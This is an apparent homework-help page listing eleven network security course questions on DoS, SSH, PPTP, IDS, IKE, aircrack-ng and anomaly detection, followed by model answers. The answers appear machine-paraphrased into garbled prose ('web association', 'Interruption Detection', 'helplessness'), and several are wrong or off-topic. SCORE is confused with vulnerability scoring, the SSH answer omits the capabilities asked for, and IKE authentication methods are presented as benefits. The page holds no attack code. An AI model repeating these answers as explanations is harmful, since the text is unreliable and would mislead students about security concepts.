1. (TCO A) What is a denial-of-service attack? How does a denial-of-service atta
ID: 3849985 • Letter: 1
Question
1. (TCO A) What is a denial-of-service attack? How does a denial-of-service attack differ from a distributed denial-of-service attack? (Points : 25)
Question 2.2. (TCO A) What does SCORE have to do with network security? Discuss what role it has, if any. (Points : 25)
Question 3.3. (TCO B) A method to respond to security advisories should at least these five elements. (Points : 25)
Question 4.4. (TCO B) What is the difference between a service pack and a hotfix? (Points : 25)
Question 5.5. (TCO C) What are the three core SSH capabilities? What does each do? (Points : 25)
Question 6.6. (TCO C) What are the limitations of PPTP? (Points : 25)
Question 7.7. (TCO D) What are the two types of IDS devices? (Points : 25)
Question 8.8. (TCO E) Name three of the benefits of IKE. (Points : 25)
Question 9.9. (TCO F) What is aircrack-ng used for and how does it work? (Points : 25)
Question 10.10. (TCO G) When considering vulnerability scanners, why is a program’s capability to conduct an accurate scan crucial? (Points : 25)
Question 11.11. (TCO D) Discuss anomaly detection. (Points : 20)
1. (TCO A) What is a denial-of-service attack? How does a denial-of-service attack differ from a distributed denial-of-service attack? (Points : 25)
Explanation / Answer
1. Denial of Service attack implies one PC and one web association is utilized to surge a server with packets (TCP/UDP). The purpose of such a denial of service attack is to over-burden the focused on server's transfer speed and different assets. This will make the server out of reach to others, accordingly blocking the site or whatever else is facilitated there.
Distributed Denial of Service Attack is like a DoS attack however the outcomes are a whole lot disimilar. Rather than one PC and one web association the DDoS attack uses numerous PCs and numerous associations. The PCs behind such an attack are regularly disseminated around the entire world and will be a piece of what is known as a botnet. The fundamental contrast between a DDoS attack versus a DoS attack, is that the objective server will be over-burden by hundreds or even a great many demands on account of the previous instead of only one attacker on account of the last mentioned.
2.2 A standard inside the PC and systems administration fields for evaluating and grouping security vulnerabilities. This standard is centered around rating a helplessness contrasted with others, hence helping the manager to set needs. The suppliers just investigate an organization's security pose utilizing remotely open information that they needn't bother to acquire it. That likewise implies that organizations could have a security score without knowing it.
3.3 1) An Effective Framework – A structure must be received, balanced, and tweaked to an association's specific conditions and the kind of information being secured – which requires a deliberate exertion with respect to the association. Officials need to set up legitimate administration that applies to the majority of the association's assets – its kin, procedures, and innovation. Picking and executing a proper system is a fundamental initial step to building a cybersecurity hazard administration program.
2) End-to-End Scope – A cybersecurity program must be thorough so as to be effective – that is, address all information in the association that should be ensured. An association may find that finding the greater part of its information is a test due to the always developing number of gadgets associated with the system. Furthermore, an association must receive a complete way to deal with recognizing each cybersecurity concern – from outsider sellers to work forms. To be powerful, a cybersecurity program must keep the majority of the basic components of the association that should be ensured in its degree.
3) Intensive Risk Assessment and Threat Modeling – Identifying the dangers and the probability of a variety of dangers and the harm they could do is a basic stride to organize cybersecurity dangers. In organizing, the cybersecurity group ought to consider the association's information from an outside viewpoint, as it were distinguish which information is probably going to be profitable from a programmer's perspective. This point of view will enable the group to build up a successful cybersecurity technique to help avoid likely assaults.
4) Proactive Incident Response Planning – Acknowledging that any framework's security may be broken in the long run, numerous associations have received occurrence reaction arranges. A large portion of those arrangements simply gather tidy and are outdated while representatives stay ill-equipped when the arrangements are truly required. Adopting a proactive strategy to episode reaction arranging implies testing the arrangement, distinguishing how to enhance its viability, making those upgrades, and guaranteeing that staff are prepared and arranged to respond to a security break and point of confinement its harm.
5) Devoted Cybersecurity Resources – The last, however not slightest, basic component is faculty who are committed to dealing with the association's cybersecurity. Keeping in mind the end goal to set up a compelling cybersecurity hazard administration program, it is basic that the parts and duties regarding the administration of the picked structure be obviously characterized.
4.4 Service pack - accumulation of hot fixes/patches, can contain new components.
patch/hotfix - a refresh tending to a particular issue (if there is a distingtion between the two it would be that hot fix isnt as tried as a refresh/fix and can be not open accessible). I don't know whether there is an official wording with respect to refresh/fix/hotfix, think meanwhile the official terms are LDR and GDR for the hotfix and tried code.
5.5 SSH keys give an indistinguishable access from client names and passwords. Besides, they regularly concede access to special records on the working framework level, giving a charge line. However, as a rule, SSH keys have been totally ignored in character and get to administration arranging, usage, and reviews. Clients have possessed the capacity to make and introduce keys without oversight and controls. This has prompted infringement of corporate get to arrangements and unsafe indirect accesses.
Throughout the most recent couple of years, it has turned out that most substantial associations have huge quantities of SSH keys in their condition. These keys resemble passwords. They allow access to assets - creation servers, databases, switches, firewalls, fiasco recuperation frameworks, money related information, installment frameworks, licensed innovation, and patient data.
Data security begins from controlling who is offered access to frameworks and information. The rest is for the most part simply authorizing that get to and ensuring it can't be bypassed.
6.6 Some limitations are:
1) Low Security Standards
To begin with, PPTP is said to have poorer security contrasted with alternate conventions. Furthermore, PPTP does not offer information trustworthiness or information inception confirmation. This implies you can't make sure whether the information that is sent over this convention is credible or has been altered. This altogether brings down the unwavering quality of utilizing the convention particularly if your organization is managing extremely delicate data.
2) Bring down Performance on Unstable Connections
The other inconvenience related with this convention is that it typically has execution issues when utilized on unsteady systems. For the most part, it can be named as a satisfactory approach to associate laborers and offer archives. Nonetheless, it won't be of much help in the event that you have a considerable measure of private data that you have to share.
7.7 The two types are Active and Passive Intrusion Detection Systems. An active Intrusion Detection Systems (IDS) is otherwise called Intrusion Detection and Prevention System (IDPS). Interruption Detection and Prevention System (IDPS) is arranged to consequently piece speculated attacks with no mediation required by an administrator. Interruption Detection and Prevention System (IDPS) has the benefit of giving continuous restorative activity because of an attack.
A passive IDS is a framework that is arranged to just screen and examine organize movement action and alarm an administrator to potential vulnerabilities and assaults. A passive IDS is not fit for playing out any defensive or restorative capacities all alone.
8.8 The three benefit of IKE is authentication using a pre-shared secret, authentication using RSA encrypted nonces, and authentication using RSA signatures.
9.9 Aircrack-ng is a network software suite consisting of a detector, WEP, packet sniffer and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any remote network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.
10.10 The scans must be accurate and reported minimal false positives i.e. defined as the normal configuration that mistakely report as malware. The new technologies are also getting released day by day and there is way to automatically update.
11.11 Anomaly detection is the distinguishing proof of things, occasions or perceptions which don't fit in with a normal example or different things in a dataset.Typically the strange things will mean some sort of issue, for example, bank extortion, an auxiliary deformity, therapeutic issues or mistakes in a content.In particular, in the context of abuse and network intrusion detection, the interesting objects are often not rare objects, but unexpected bursts in activity.
Related Questions
Navigate
Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.